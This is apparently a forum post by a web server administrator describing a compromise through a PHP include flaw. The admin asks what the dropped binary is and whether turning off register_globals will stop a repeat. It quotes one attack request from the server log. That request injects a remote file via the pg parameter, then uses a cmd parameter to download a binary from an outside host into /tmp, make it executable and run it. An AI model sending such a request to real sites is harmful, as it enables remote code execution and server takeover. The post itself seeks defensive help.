poorly written PHP, code compromised.
"GET /index.php?pg=http://ttyp1.hpgvip.com.br/hkz.txt?&cmd=cd%20/tmp;wget%20simol.com.br/bdsun;chmod%20777%20bdsun;./bdsun HTTP/1.1
Obviously this bdsun file was downloaded, and ran on my web server. It along with a file called "fsun" basically bogged our whole network down. Im glad that I caught it before people really noticed.
First off, does anybody know what this is? I did a quick search on google and couldnt find anything.
secondly. This user had registered globals turned on, which obviously I turned off and now made him change to using either _POST, _GET or _REQUEST to get the variables.
The way the site is set up, you link to index.php?pg=page.html to show that page. change page.html to what every page he has on the server. A basic template type engine if you will.
Will shutting off register_globals for this user and making him use_POST, _GET or _REQUEST keep this from happening again? or should I make him stop pages that way? Does anybody know a good variable checker to make sure that malicious code isnt entered this way?
